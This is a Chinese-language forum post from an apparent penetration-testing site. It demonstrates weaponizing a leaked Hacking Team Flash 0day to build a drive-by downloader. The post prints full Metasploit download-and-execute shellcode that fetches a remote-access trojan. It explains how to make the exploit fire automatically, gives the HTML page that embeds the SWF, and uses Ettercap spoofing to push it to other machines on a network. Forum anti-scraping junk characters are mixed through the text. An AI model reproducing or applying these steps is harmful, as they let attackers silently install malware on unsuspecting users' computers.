中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

8 R5 I5 w4 }/ a/ [3 p 三、flash 0day之手工代码修改制作下载者实例入侵演示 $ g( k$ X' T2 D* [

/ K% Q" P6 S8 K3 e c- \% J

7 i5 Y2 K) T0 e0 ^ 利用到的工具: ! ? L2 C+ {) i) S: N6 E( _3 i

0 b% G3 R/ Q; q5 s

! {+ ^6 g/ a# ^ Msf ( _ j" V, E( O p/ r9 a2 M- g

+ a7 S2 U/ S7 X2 P

& X6 O* W9 r! J& B Ettercap # g! `$ _. e4 k3 \3 x

( y0 f- F& k- O; Z9 F

y5 C3 |' V) h9 O1 m! R Adobe Flash CS6 - g5 v- |/ ]8 v

, w, J; s) H& `

7 ]7 }' d& R9 ?5 J# } Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 * E& ]" }1 Y6 r+ F

7 R! `0 ^7 [8 P% I! L

- c$ ?- d, m) c7 M 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options # B' ]8 L/ } l" v2 h

. ~. U( z1 t# O; c2 X

/ o$ \' ^8 ^# m/ G1 a( j% } k 如图: : `" y' F" n% R: z

0 `; N" A8 e3 Y H+ o+ ?

% T2 u4 j% n% x" V   ' X% J& k3 l- a0 `2 n6 u

5 k; B! r9 O, z& f8 u

4 A! O. N9 S/ I& `   , U5 a2 c5 j. X7 {3 e4 @

- l. w7 [4 R/ F1 |0 U' [) s& l

) c& ]3 v; s5 | d6 X$ Q3 f 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 Q3 i( B& x& V/ C/ R2 t! K

" ~. k) d' b! I( s

$ y' U+ ?) K, m1 O2 P5 B2 t   1 b! G) n! T4 P% Y! U! c, J9 f8 a

7 k1 B( M% p% r$ j

/ a7 w8 C+ B; F, b& j* }6 ^   2 @6 O7 J0 D# A+ _. c- j1 b) D1 `$ b9 j

; z& N: {+ o( x0 X

! E& h# J! ?8 w8 O) Z 然后执行generate -t dword生成shellcode,如下: 3 J* j# \9 A! p6 I1 W3 w6 e

- Q4 l$ y" |9 C, J& s

& o& ^4 `+ h. q0 ~& w   0 q1 X# L. f! R

2 W) u# I% c# s2 o

& U) N- D. L& ?. h 复制代码到文本下便于我们一会编辑flash exp,如下: $ u b! E& `8 u9 S7 t6 }+ K

5 k$ Q! L8 |& X3 P! r+ b

+ _: K# l7 p6 ^/ P% d 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 M# j3 L) b D& x8 p" B g

/ ?8 T& `* o3 j2 j

* g# R+ `) t& m1 ]. J# ] 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 f. w/ Y- P6 u( T) U

. ]2 X# | R* }0 y1 u

; a4 h$ T" C- V4 @& P, l 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, % N+ P0 i, g6 O; n! [4 S1 v

8 c# J1 C& T; r0 s

' Z1 K# D: @* p0 x) ^& ? 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 m8 N! J- L Y0 T5 L

( y- d/ B$ @; S2 b

$ q6 a9 M8 L0 L& t 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, - O5 q P- T m5 U

& i& v+ N2 m, N3 o& H; @! n1 o

& n' E6 F3 k( x+ d+ q" N: f 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / r4 E0 A% M: P1 h% J

, U8 x A/ \+ B, V/ f- Y6 {

2 N9 I/ ~! D# c 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ?' b3 o* x' ]- e9 s

* L4 o: N/ w+ u' P. u

5 I# c1 H6 `/ ~& \5 Q4 W' \ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' {$ a- W2 D: b1 K8 ]4 N7 o

/ k1 W1 `% e& t; U

) p4 |$ i2 o$ b5 v% R 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 v2 x6 z: M* x5 D) l

! t% }' y6 M, _1 q9 E

5 z9 X+ J( e: A2 J4 p% a 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, , k& B$ b7 y$ o4 \5 }4 z# [! \

5 r" l# H9 M6 I8 b

9 Z" h& |" P/ C; B: ?; c 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 1 a1 `) }) F7 m3 g

, V& T1 v7 L/ V6 U- Y9 r. U0 S2 T

- M* [) t" x8 K 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , @$ _6 e3 K0 U' R- r

; {/ N; |$ u% J' B( v. v& I1 k

4 V) W/ c) g* U4 T( e 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 3 o! G* |: h! A( p" d2 p8 T( j

6 ~9 s. n( l$ V( ]8 d, @1 A# O

8 j4 N, T# `# D2 p 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 7 P, g' L) k, w1 @. j

8 u! A" R) i0 ~6 ?' t3 Z. B

) B7 e" l; F" C1 [9 s# _5 U. ~   3 f: p3 S1 M6 M# I1 ]: W& i

6 ?# O, a. l; G9 ~+ U

! T' P- @6 _2 }4 O: G   0 F! \* U( i( U0 v

/ H, q0 s2 W7 y

* Q) o% l8 c6 v4 i3 u4 N0 s 下面我们来修改flash 0day exp,需要修改三个文件,分别为: / c2 \+ O4 I0 t6 |0 o Z

/ D( a2 t0 i0 U7 N

1 h+ u. ~7 z- t. `9 K   , p- b6 @4 W1 _$ [4 w3 k8 c

; ^2 {2 D3 x1 J$ d

6 M3 D" e% n9 X1 y9 M 先修改ShellWin32.as,部分源代码如图: ' a7 R) i2 }/ |% H9 r _0 V) t9 g

# [6 w2 p0 A2 P) z* a6 s

) J# p# l7 N4 j2 \& m   ( s, R, a3 w4 v* R9 v. u

1 Z- n6 j( y7 ^& |& \7 h

. y P2 x, L' t 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 O$ V3 g2 v% M: k: ~

|8 B) U/ T% X8 @

: K- G" T# e* h- c" c0 G( \: _1 e   " G! T9 W8 y% p! O: L

$ h- F1 g8 w- a2 p

. e# m" }7 @: E4 ?. c 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 9 \( T- c3 O3 y' M& r

: n2 R% k% K5 V* x3 g2 E/ i; _8 s- N

2 O L2 H( p. y   % [; Y" C' M) \, E- x, E

2 {. q; s; ~ G: P. D2 i- |9 }8 d& j

8 d- _% M& I7 g+ o I/ r! Q; V 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 9 [' j+ M" Y* u

; K3 N2 ?' S# A

0 D% ^. t. u+ E7 L [   9 G4 u6 S5 m* m& A5 U$ k6 I

/ g- z p g* x8 U6 z

3 m5 o( I+ x: s+ W, l5 e) Q% } _   9 Z6 K$ x. P& J( I3 p4 H2 E, r

3 o3 M+ I( p% p4 V

: M" j9 _% n% P% s% T% ?. E% b   4 I/ ?, n: c5 D$ i o' p3 Q z

% U! D% m; r. F# m

4 h0 J- }" G$ q7 k/ B8 i1 ?. E/ G 然后点保存,下面我们来编译一下,打开 ; ~, V, N/ h; C4 y3 ^

+ G& n; {( h' n4 e: r

& P/ E) z" w* y$ H exp1.fla然后点文件-发布,看看编译没错误 7 Q e( P g5 l- g

/ r5 b% a6 x- y" B

4 u7 n) R$ C( }- k1 l   |8 m1 T0 j0 Q5 S

) m+ e4 H& u( p- c, x% V q: W1 X

# N/ Q! z/ {! r5 O4 S1 r1 n" V' j) f   * w5 P& o% T0 H- ~5 b3 B5 v

+ q% o6 K$ v, K, {' H* d/ |

% M6 u" s9 b% T$ r   & B* U% [' o( {( j( m

/ L( ?8 R7 n) V2 D- \/ F

% {- x: X) j5 O" [7 v2 w) L   * U' w; w j( M5 ]2 v

2 B7 \8 D3 S; \6 Q& T' _, [; F

8 D. a. F- L$ ~) @- P0 i 然后我们把生成的 % ~; Z4 K! z1 e$ s% ~( n; R

: g) {0 I) A' t6 V9 H- A

. e5 N, P5 A% h* g& o# n- s exp1.swf丢到kailinux /var/www/html下: ! o$ v0 i1 K0 o$ u; ?, C

]1 \7 i2 f! M; x

. a+ z# q% q: C 然后把这段代码好好编辑一下 ( I$ y! W H! V) W. M

- o9 _) C3 e( ^( b$ p

* ?) i% H& \* S   & N- `2 i1 ^0 z" N

: Y% {$ j( K0 Y" P

5 A+ {7 d* [, p$ T$ z   % ]1 y3 ~1 U( ]- Y' { x) ]

, \8 r, H+ O) L% r: D

Q9 t8 N3 H$ A0 l   * j" N" U/ @, g: G# o0 e

2 \1 s- m0 I4 {1 o: H9 V: K

2 p0 F( o( b5 |9 V% b( C   , v' o9 u, g7 V5 q8 B3 R* r

, l. l. X8 Z+ j% s; b

% u* M" w! C- g* } I   : l% b& e! E9 u0 Y

' x6 K' @$ {1 Z& D* N; H8 Q

5 ~; W1 A( _' j; E4 W   ' j; H% v3 \" q6 G

' [1 Y4 l' B7 U k9 V1 W* S

7 @ V# g3 H% M. Y& H% B8 v <!DOCTYPE html> 4 t! _* J% R4 Y3 L3 `, F% z$ t

, x& o9 g/ m/ H! m0 H: [7 }5 S

: J& F, D3 C! L <html> 8 ? N4 y- f( s5 k( F9 X

$ p& m' R, U& N0 U3 Y

0 h4 A$ W. |8 m" \7 }' r9 F7 w% J <head> / M/ R, g z; q

( a o& N$ l: G; v' a- o' b& P

9 Q3 L" ^6 U* o* G <meta http-equiv="Content-Type" content="text/html; 2 Q5 K2 U' `2 Z0 A

+ [- E, f, x' E

) y% J3 K) R/ g2 Q8 a charset=utf-8"/> ' m5 F' W* p9 q+ j. t! m

/ P+ N: S2 x! _4 ~! D1 i5 N

7 y/ x! n# f+ `% S </head> 6 z2 y2 U Q& ] j

5 K2 p3 j& Q+ C6 U. B

d U4 M0 |3 a; k: v6 G1 A) T <body> + v+ m) @) Q+ b9 N! _. b

& A- i, ]8 f/ H0 C# W% i L3 h: m

2 w, b; }8 q- K+ M <h2> Please wait, the requested page is loading...</h2> ; n) p# z; M: m2 v

- r& V4 [8 c6 I" [6 n! u% ^6 p4 b5 f

1 O9 P2 D7 ?/ O$ r' W7 p <br> ) W7 T( S: w8 p9 w9 B

$ z0 \+ v5 n6 V4 T1 N

% G. X2 f! v( Q3 e <OBJECT 1 K+ L! R$ E, Z& w

4 k9 l. p/ J0 P: K7 L

- R. @9 ? m: ]6 c$ c3 V7 t classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 6 T. W9 Q7 E7 o3 y% B7 L

; P& C3 X e7 E$ K

+ h) I% L0 _6 A VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 0 A+ n; ]; h5 q

- o. @* \1 |% g: M! N

2 ]% n3 R) `* F; C- {3 ?2 {( u7 x </body> $ W2 `) M+ j3 r! i* K; f0 t' I

* m3 c2 o; b2 O- I+ \6 m

; o* q) F- G7 @# d! ^; n: d <script> $ T( k. |! L" D2 W

9 G2 e _ X. {. S5 M/ S2 m: d

/ i+ R, d, x8 C/ u2 l# E. |2 d' p     setTimeout(function () { 4 ]( y e$ ?) I+ w7 X% t

$ {5 X" ?" M1 d# |/ l6 X

2 q- L" s6 m' t0 r7 Z# X! s: n) P          6 r9 h8 ^8 D; ~. {; K- @* c+ A

1 W2 J1 M2 E2 L' y. H

p1 Y: u3 I/ O, h% L# ] window.location.reload(); ; L: H* x" [3 o' p

' [7 [( d9 y7 [7 a0 K1 D

: M8 T. F& z- L- H" b     }, 10000); . E# {$ r A' g7 U% ]" k

7 o. y7 A- N0 V' ]$ J6 S v

3 h( N1 J* ~: L' R4 @   L X. y( K* R

! f5 y1 ?* U8 J0 ]7 _

1 y/ M* ^- j4 {7 S7 I% U- H </script> % ]) z. Z5 p6 X4 l* k: K/ d& D

D& u/ R: Z, P- }0 c7 T0 h) C

* o1 V0 y3 f# ^4 k" l </html> . d% q& {# R6 C0 ~) b

6 s* i5 L+ q; c5 A: H/ t9 q3 n

7 O1 n& Q: s3 q; e   7 w5 F+ l- Y5 [/ [! ?0 k* o

6 z) A/ a, J a4 L0 ^ ?# X5 J

" ~9 W* T+ U( F# j6 ` 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 7 p/ v! p5 k$ R& \4 D- B) V

: U7 Q4 q! ]9 s0 `" U

2 @8 B, a e9 d3 i   . [& d+ o3 O2 N3 s& v$ P

`7 I% F9 y: W' U7 X0 U

! Z' ~; {4 \) v+ A1 E   # K5 z" g9 J& Q5 q

: s% Q) n: g2 r

( `9 L4 u0 |( ~0 t0 C8 `4 j! X5 N. v   $ w' J9 n8 e: ~( s

8 ?, M7 O& r; D% R0 \

% \0 |9 \. j4 M) y& k+ x   ( j* [; o$ }. Y

1 x, H; m* j( N

9 k+ t2 A+ z ?+ l5 {) \5 F   * N& O( t& v7 M

& I( y! G. R* H% p+ ^! e9 |( W

$ v. _* B7 T1 N8 C1 C7 X: ? h, t2 p 下面我们用ettercap欺骗如图: ; @9 i) K: V! J7 g% {' c

! Q! I& d' X& d+ E* S

8 |9 G+ n! b, Z$ ^" O   - G4 s5 k7 M7 X* J

* b, M6 Q9 E0 [6 h" f" ]

' C h+ N3 f4 ?+ p% U   2 W4 d$ e2 s8 |; M1 u- R4 V0 Y

) h: A* ?, j5 K& r. f

/ z0 {& w# l) ]2 A: v- c( m. A 下面我们随便访问个网站看看: 3 V- r8 L& J$ }

' S" w" W4 B/ i) @

$ D) Z4 v7 j) b6 A( i6 d4 x1 e4 A 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 0 Y# ~8 Y* I7 t3 Y0 Y

$ H6 f7 K0 Y& N+ u+ r1 f1 c9 o

! j& m c9 L: W" z   9 d% n5 ]7 N3 E/ R$ w8 ?! ^

+ k* q2 ?4 W P% L

8 \' R6 b3 K5 @ 我们看另一台, * L% _5 T+ P" f! W

! Q* w% o! E9 g3 l4 K8 a( ~

. B$ ~. W7 C$ r' p4 ` 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 " Z( t, }5 U3 c) H2 @$ j5 L





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2